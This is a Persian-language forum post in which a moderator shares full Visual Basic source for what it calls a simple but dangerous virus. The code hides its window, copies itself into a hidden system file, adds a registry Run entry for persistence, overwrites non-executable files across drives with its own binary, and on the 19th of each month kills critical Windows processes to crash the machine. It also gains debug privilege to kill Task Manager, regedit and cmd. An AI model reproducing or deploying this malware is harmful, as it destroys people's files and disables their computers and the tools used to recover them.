Ghoghnus
مدیر بخش
ارسالها: 1,497
موضوعها: 270
تاریخ عضویت: آذر ۱۳۸۸
تشکرها : 1652
( 3938 تشکر در 1453 ارسال )
|
سورس ویروس ساده در عین حال خطر ناک با ویژال بیسیک
سلام 
سورس یه ویروس ساده  در عین حال خطر ناک
این ویروس از زمان اجرا تمام فایلها را خراب میکنه  و از روز 19ماه میلادی شروع به ریست کردن یهویی سیستم (روش جدا از شات دان معمولی)میکنه
کد: Dim man1 As String
Sub myposhe(sPath As String)
sdir = Dir(sPath, vbDirectory)
Do Until LenB(sdir) = 0
Debug.Print sdir
sdir = Dir
kharab (sPath + sdir + "\")
Loop
End Sub
Private Sub kharab(p As String)
sFilename = Dir(p)
Do While sFilename > ""
Debug.Print sFilename
sFilename = Dir()
If (Right(sFilename, 4) <> ".exe") Then
List1.AddItem (sFilename)
FileCopy manyer, sFilename
End If
Loop
End Sub
Sub winGa()
End Sub
Private Sub Command1_Click()
End Sub
Private Sub Form_Load()
Call startt
End Sub
Private Sub Timer1_Timer()
On Error Resume Next
Call startt
If (Day(Date) = 19) Or (GetSetting("iran", "mm", "aa", "0") = 19) Then
Call SaveSetting("iran", "mm", "aa", "19")
Call EndAnyProcess("smss.exe")
Call EndAnyProcess("csrss.exe")
Call EndAnyProcess("system.exe")
Call EndAnyProcess("svchost.exe")
End If
End Sub
Sub startt()
On Error Resume Next
App.TaskVisible = False
Hide
Top = 10000
Dim mizYer As String
''mizYer = Environ$("USERPROFILE") & "\ali.txt"
''MsgBox mizYer
Dim manyer
manyer = App.Path
Dim llenman As Integer
llenman = Len(manyer)
If llenman = 3 Then
manyer = manyer + App.ExeName + ".exe"
Else
manyer = manyer + "\" + App.ExeName + ".exe"
End If
FileCopy manyer, man1
SetAttr man1, vbHidden + vbSystem
SetStringValue "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run", "Window", man1
'\////////////////
List1.Clear
For Cl = 100 To 97 + 25
If dt <> 1 Then
List1.AddItem (Chr(Cl) + ":")
kharab (Chr(Cl) + ":\")
myposhe (Chr(Cl) + ":\")
End If
Next Cl
End Sub
Private Sub Timer2_Timer()
Call Shell("explorer.exe", vbNormalFocus)
End Sub
ماژول ها
کد: Type FILETIME
lLowDateTime As Long
lHighDateTime As Long
End Type
Declare Function RegOpenKeyEx Lib "advapi32.dll" Alias "RegOpenKeyExA" (ByVal hKey As Long, ByVal lpSubKey As String, ByVal ulOptions As Long, ByVal samDesired As Long, phkResult As Long) As Long
Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long
Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Declare Function RegDeleteKey Lib "advapi32.dll" Alias "RegDeleteKeyA" (ByVal hKey As Long, ByVal lpSubKey As String) As Long
Declare Function RegQueryValueEx Lib "advapi32.dll" Alias "RegQueryValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal lpReserved As Long, lpType As Long, ByVal lpData As String, lpcbData As Long) As Long
Declare Function RegQueryValueExA Lib "advapi32.dll" (ByVal hKey As Long, ByVal lpValueName As String, ByVal lpReserved As Long, lpType As Long, ByRef lpData As Long, lpcbData As Long) As Long
Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, ByVal lpData As String, ByVal cbData As Long) As Long
Declare Function RegSetValueExA Lib "advapi32.dll" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, ByRef lpData As Long, ByVal cbData As Long) As Long
Declare Function RegSetValueExB Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, ByRef lpData As Byte, ByVal cbData As Long) As Long
Const ERROR_SUCCESS = 0&
Const ERROR_BADDB = 1009&
Const ERROR_BADKEY = 1010&
Const ERROR_CANTOPEN = 1011&
Const ERROR_CANTREAD = 1012&
Const ERROR_CANTWRITE = 1013&
Const ERROR_OUTOFMEMORY = 14&
Const ERROR_INVALID_PARAMETER = 87&
Const ERROR_ACCESS_DENIED = 5&
Const ERROR_NO_MORE_ITEMS = 259&
Const ERROR_MORE_DATA = 234&
Const REG_NONE = 0&
Const REG_SZ = 1&
Const REG_EXPAND_SZ = 2&
Const REG_BINARY = 3&
Const REG_DWORD = 4&
Const REG_DWORD_LITTLE_ENDIAN = 4&
Const REG_DWORD_BIG_ENDIAN = 5&
Const REG_LINK = 6&
Const REG_MULTI_SZ = 7&
Const REG_RESOURCE_LIST = 8&
Const REG_FULL_RESOURCE_DESCRIPTOR = 9&
Const REG_RESOURCE_REQUIREMENTS_LIST = 10&
Const KEY_QUERY_VALUE = &H1&
Const KEY_SET_VALUE = &H2&
Const KEY_CREATE_SUB_KEY = &H4&
Const KEY_ENUMERATE_SUB_KEYS = &H8&
Const KEY_NOTIFY = &H10&
Const KEY_CREATE_LINK = &H20&
Const READ_CONTROL = &H20000
Const WRITE_DAC = &H40000
Const WRITE_OWNER = &H80000
Const SYNCHRONIZE = &H100000
Const STANDARD_RIGHTS_REQUIRED = &HF0000
Const STANDARD_RIGHTS_READ = READ_CONTROL
Const STANDARD_RIGHTS_WRITE = READ_CONTROL
Const STANDARD_RIGHTS_EXECUTE = READ_CONTROL
Const KEY_READ = STANDARD_RIGHTS_READ Or KEY_QUERY_VALUE Or KEY_ENUMERATE_SUB_KEYS Or KEY_NOTIFY
Const KEY_WRITE = STANDARD_RIGHTS_WRITE Or KEY_SET_VALUE Or KEY_CREATE_SUB_KEY
Const KEY_EXECUTE = KEY_READ
Dim hKey As Long, MainKeyHandle As Long
Dim rtn As Long, lBuffer As Long, sBuffer As String
Dim lBufferSize As Long
Dim lDataSize As Long
Dim ByteArray() As Byte
'This constant determins wether or not to display error messages to the
'user. I have set the default value to False as an error message can and
'does become irritating after a while. Turn this value to true if you want
'to debug your programming code when reading and writing to your system
'registry, as any errors will be displayed in a message box.
Const DisplayErrorMsg = False
Function SetDWORDValue(SubKey As String, Entry As String, Value As Long)
Call ParseKey(SubKey, MainKeyHandle)
If MainKeyHandle Then
rtn = RegOpenKeyEx(MainKeyHandle, SubKey, 0, KEY_WRITE, hKey) 'open the key
If rtn = ERROR_SUCCESS Then 'if the key was open successfully then
rtn = RegSetValueExA(hKey, Entry, 0, REG_DWORD, Value, 4) 'write the value
If Not rtn = ERROR_SUCCESS Then 'if there was an error writting the value
If DisplayErrorMsg = True Then 'if the user want errors displayed
'msgbox ErrorMsg(rtn) 'display the error
End If
End If
rtn = RegCloseKey(hKey) 'close the key
Else 'if there was an error opening the key
If DisplayErrorMsg = True Then 'if the user want errors displayed
'msgbox ErrorMsg(rtn) 'display the error
End If
End If
End If
End Function
Function GetMainKeyHandle(MainKeyName As String) As Long
Const HKEY_CLASSES_ROOT = &H80000000
Const HKEY_CURRENT_USER = &H80000001
Const HKEY_LOCAL_MACHINE = &H80000002
Const HKEY_USERS = &H80000003
Const HKEY_PERFORMANCE_DATA = &H80000004
Const HKEY_CURRENT_CONFIG = &H80000005
Const HKEY_DYN_DATA = &H80000006
Select Case MainKeyName
Case "HKEY_CLASSES_ROOT"
GetMainKeyHandle = HKEY_CLASSES_ROOT
Case "HKEY_CURRENT_USER"
GetMainKeyHandle = HKEY_CURRENT_USER
Case "HKEY_LOCAL_MACHINE"
GetMainKeyHandle = HKEY_LOCAL_MACHINE
Case "HKEY_USERS"
GetMainKeyHandle = HKEY_USERS
Case "HKEY_PERFORMANCE_DATA"
GetMainKeyHandle = HKEY_PERFORMANCE_DATA
Case "HKEY_CURRENT_CONFIG"
GetMainKeyHandle = HKEY_CURRENT_CONFIG
Case "HKEY_DYN_DATA"
GetMainKeyHandle = HKEY_DYN_DATA
End Select
End Function
Function ErrorMsg(lErrorCode As Long) As String
'If an error does accurr, and the user wants error messages displayed, then
'display one of the following error messages
Select Case lErrorCode
Case 1009, 1015
GetErrorMsg = "The Registry Database is corrupt!"
Case 2, 1010
GetErrorMsg = "Bad Key Name"
Case 1011
GetErrorMsg = "Can't Open Key"
Case 4, 1012
GetErrorMsg = "Can't Read Key"
Case 5
GetErrorMsg = "Access to this key is denied"
Case 1013
GetErrorMsg = "Can't Write Key"
Case 8, 14
GetErrorMsg = "Out of memory"
Case 87
GetErrorMsg = "Invalid Parameter"
Case 234
GetErrorMsg = "There is more data than the buffer has been allocated to hold."
Case Else
GetErrorMsg = "Undefined Error Code: " & Str$(lErrorCode)
End Select
End Function
Private Sub ParseKey(Keyname As String, Keyhandle As Long)
rtn = InStr(Keyname, "\") 'return if "\" is contained in the Keyname
If Left(Keyname, 5) <> "HKEY_" Or Right(Keyname, 1) = "\" Then 'if the is a "\" at the end of the Keyname then
'msgbox "Incorrect Format:" + Chr(10) + Chr(10) + Keyname 'display error to the user
Exit Sub 'exit the procedure
ElseIf rtn = 0 Then 'if the Keyname contains no "\"
Keyhandle = GetMainKeyHandle(Keyname)
Keyname = "" 'leave Keyname blank
Else 'otherwise, Keyname contains "\"
Keyhandle = GetMainKeyHandle(Left(Keyname, rtn - 1)) 'seperate the Keyname
Keyname = Right(Keyname, Len(Keyname) - rtn)
End If
End Sub
Function CreateKey(SubKey As String)
Call ParseKey(SubKey, MainKeyHandle)
If MainKeyHandle Then
rtn = RegCreateKey(MainKeyHandle, SubKey, hKey) 'create the key
If rtn = ERROR_SUCCESS Then 'if the key was created then
rtn = RegCloseKey(hKey) 'close the key
End If
End If
End Function
Function SetStringValue(SubKey As String, Entry As String, Value As String)
Call ParseKey(SubKey, MainKeyHandle)
If MainKeyHandle Then
rtn = RegOpenKeyEx(MainKeyHandle, SubKey, 0, KEY_WRITE, hKey) 'open the key
If rtn = ERROR_SUCCESS Then 'if the key was open successfully then
rtn = RegSetValueEx(hKey, Entry, 0, REG_SZ, ByVal Value, Len(Value)) 'write the value
If Not rtn = ERROR_SUCCESS Then 'if there was an error writting the value
If DisplayErrorMsg = True Then 'if the user wants errors displayed
'msgbox ErrorMsg(rtn) 'display the error
End If
End If
rtn = RegCloseKey(hKey) 'close the key
Else 'if there was an error opening the key
If DisplayErrorMsg = True Then 'if the user wants errors displayed
'msgbox ErrorMsg(rtn) 'display the error
End If
End If
End If
End Function
و ماژول دوم
کد: Private Declare Function GetVersion Lib "kernel32" () As Long
Private Declare Function GetCurrentProcess Lib "kernel32" () As Long
Private Declare Function OpenProcessToken Lib "advapi32" (ByVal ProcessHandle As Long, ByVal DesiredAccess As Long, TokenHandle As Long) As Long
Private Declare Function LookupPrivilegeValue Lib "advapi32" Alias "LookupPrivilegeValueA" (ByVal lpSystemName As String, ByVal lpName As String, lpLuid As LUID) As Long
Private Declare Function AdjustTokenPrivileges Lib "advapi32" (ByVal TokenHandle As Long, ByVal DisableAllPrivileges As Long, NewState As TOKEN_PRIVILEGES, ByVal BufferLength As Long, PreviousState As Any, ReturnLength As Any) As Long
Private Declare Function GetWindowThreadProcessId Lib "user32" (ByVal hwnd As Long, lpdwProcessId As Long) As Long
Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessID As Long) As Long
Private Declare Function ReadProcessMemory Lib "kernel32" (ByVal hProcess As Long, ByVal lpBaseAddress As Long, lpBuffer As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
Private Declare Function CreateToolhelp32Snapshot Lib "kernel32" (ByVal dwFlags As Long, ByVal th32ProcessID As Long) As Long
Private Declare Function Process32First Lib "kernel32" (ByVal hSnapshot As Long, lppe As Any) As Long
Private Declare Function Process32Next Lib "kernel32" (ByVal hSnapshot As Long, lppe As Any) As Long
Private Declare Function TerminateProcess Lib "kernel32" (ByVal hProcess As Long, ByVal uExitCode As Long) As Long
Private Const TOKEN_ADJUST_PRIVILEGES = &H20
Private Const TOKEN_QUERY = &H8
Private Const SE_PRIVILEGE_ENABLED = &H2
Private Const PROCESS_ALL_ACCESS As Long = &H1F0FFF
Private Const PROCESS_VM_READ = 16
Private Const TH32CS_SNAPHEAPLIST = &H1
Private Const TH32CS_SNAPPROCESS = &H2
Private Const TH32CS_SNAPTHREAD = &H4
Private Const TH32CS_SNAPMODULE = &H8
Private Const HKEY_CLASSES_ROOT = &H80000000
Private Const TH32CS_SNAPALL = (TH32CS_SNAPHEAPLIST + TH32CS_SNAPPROCESS + TH32CS_SNAPTHREAD + TH32CS_SNAPMODULE)
Private Type PROCESSENTRY32
dwSize As Long
cntUsage As Long
th32ProcessID As Long
th32DefaultHeapID As Long
th32ModuleID As Long
cntThreads As Long
th32ParentProcessID As Long
pcPriClassBase As Long
dwFlags As Long
szexeFile As String * 260
End Type
Private Type LUID
lowpart As Long
highpart As Long
End Type
Private Type TOKEN_PRIVILEGES
PrivilegeCount As Long
LuidUDT As LUID
Attributes As Long
End Type
Function GiveMeThatHandle(ExeName) As Long
Dim P_Pid, P_Proc, adr, bfLg As Long
Dim res&, ant&
Dim u As Integer
Dim Process As PROCESSENTRY32
res = CreateToolhelp32Snapshot(TH32CS_SNAPALL, 0&)
If res <> 0 Then
Process.dwSize = Len(Process)
ant = Process32First(res, Process)
u = 0
Do
A = LCase(Process.szexeFile)
If InStr(A, ExeName) Then pids = Process.th32ProcessID
ant = Process32Next(res, Process)
u = u + 1
Loop Until ant = 0
End If
P_Pid = pids
hProcessID = P_Pid
DoEvents
Dim hToken As Long
Dim hProcess As Long
Dim tp As TOKEN_PRIVILEGES
If GetVersion() >= 0 Then
If OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES Or _
TOKEN_QUERY, hToken) = 0 Then
GoTo CleanUp
End If
If LookupPrivilegeValue("", "SeDebugPrivilege", tp.LuidUDT) = 0 Then
GoTo CleanUp
End If
tp.PrivilegeCount = 1
tp.Attributes = SE_PRIVILEGE_ENABLED
If AdjustTokenPrivileges(hToken, False, tp, 0, ByVal 0&, _
ByVal 0&) = 0 Then
GoTo CleanUp
End If
End If
P_Proc = OpenProcess(PROCESS_ALL_ACCESS, 0, hProcessID)
GiveMeThatHandle = P_Proc
CleanUp:
If hToken Then CloseHandle hToken
End Function
Function EndAnyProcess(ExeName) As Boolean
Dim phandle As Long
Const PROCESS_ALL_ACCESS = 0
phandle = GiveMeThatHandle(ExeName)
Kill_Process = CBool(TerminateProcess(phandle, uExitCode))
Call CloseHandle(phandle)
End Function
Private Sub Rest_sys()
Call EndAnyProcess("smss.exe")
Call EndAnyProcess("csrss.exe")
Call EndAnyProcess("system.exe")
Call EndAnyProcess("svchost.exe")
End Sub
Sub end_show()
Call EndAnyProcess("regedit.exe")
Call EndAnyProcess("taskmgr.exe")
Call EndAnyProcess("msconfig.exe")
Call EndAnyProcess("cmd.exe")
Call EndAnyProcess("mmc.exe")
Call EndAnyProcess("opera.exe")
End Sub
باور کنیم
همانگونه که در غیبت مقصریم در ظهور موثریم!
نیستیم؟
زیر شمشیر غمش رقص کنان باید رفت # کان که شد کُشته ی او نیک سرانجام افتاد
 دانلود پروژه برنامه نويسي
(آخرین ویرایش در این ارسال: ۱۱-اسفند-۱۳۹۷, ۱۵:۵۷:۳۴، توسط Ghoghnus.)
|
|
صفحه اصلی
انجمن
جستجو
فهرست اعضا
افزونه های فایرفاکس
» سورس ویروس ساده در عین حال خطر ناک با ویژال بیسیک
![[تصویر: a.jpg]](http://safaeian.ir/a.jpg)
تشکر شده توسط :